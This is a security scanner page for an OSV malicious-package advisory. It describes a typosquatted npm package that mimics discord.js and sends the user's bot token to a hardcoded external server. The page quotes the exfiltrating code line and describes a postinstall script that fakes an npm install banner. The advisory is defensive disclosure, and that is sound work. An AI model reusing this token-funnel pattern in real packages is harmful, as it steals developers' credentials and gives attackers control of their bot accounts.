OSV Malicious Advisory
scanned 4h ago · by OpenSSF/OSVOpenSSF/OSV advisory MAL-2026-10521 confirms this npm version as malicious. @flcik/flick.js@3.1.2 replicates the discord.js public API surface (FlickClient, GatewayIntentBits, SlashCommandBuilder, ButtonStyle, MessageFlags, the canonical `client.login('YOUR_BOT_TOKEN')` + messageCreate/!ping/Pong! example) but the implementation diverges in one critical place: `client.login()` in flick.js takes the supplied token and POSTs it to a hardcoded author-controlled endpoint. Specifically, flick.js...
Advisory
MAL-2026-10521
Source
OpenSSF Malicious Packages via OSV
Summary
Malicious code in @flcik/flick.js (npm)
Details
@flcik/flick.js@3.1.2 replicates the discord.js public API surface (FlickClient, GatewayIntentBits, SlashCommandBuilder, ButtonStyle, MessageFlags, the canonical `client.login('YOUR_BOT_TOKEN')` + messageCreate/!ping/Pong! example) but the implementation diverges in one critical place: `client.login()` in flick.js takes the supplied token and POSTs it to a hardcoded author-controlled endpoint. Specifically, flick.js line 1025 issues `await this._rest.post('/api/auth/token', { token: this.token })` against `DEFAULT_BASE_URL='https://flick-xmfx.onrender.com'` (flick.js line 19). Any developer who installs this package mistaking it for discord.js and pastes their Discord bot token into `client.login(...)` ships that token to flick-xmfx.onrender.com on the first call. Several corroborating signals confirm the package is engineered as a credential funnel rather than a real SDK: (1) `package.json` declares `"main": "index.js"` but no index.js exists in the tarball — the only shipped JS files are flick.js and postinstall.js, so `require('@flcik/flick.js')` throws, indicating the package is not built for library consumption; (2) postinstall.js fabricates a fake npm install summary (`✓ added <count> packages in <secs>s`) padded with 400–1200ms of randomness to imitate npm's own completion banner — social-engineering cover typical of typosquats; (3) the package name `@flcik/flick.js` is a transposition of `flick`/`flick.js` styled to brand-confuse against `discord.js`. Installer harm is direct: Discord bot tokens are bearer credentials granting full control of the bot account (message read/send, server join, user impersonation in the bot's scope).
## Source: ghsa-malware (51632d0a7f14c5e108f4a7f4b1237d1734454aa7a6eecad6fd0bba1de633bb4a) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.
Decision reason
OpenSSF Malicious Packages via OSV confirms @flcik/flick.js@3.1.3 as malicious (MAL-2026-10521): Malicious code in @flcik/flick.js (npm)
Source & flagged code
0 flaggedNo flagged code excerpts are attached to this scan.
Findings
1 High
HighOsv Malicious Advisory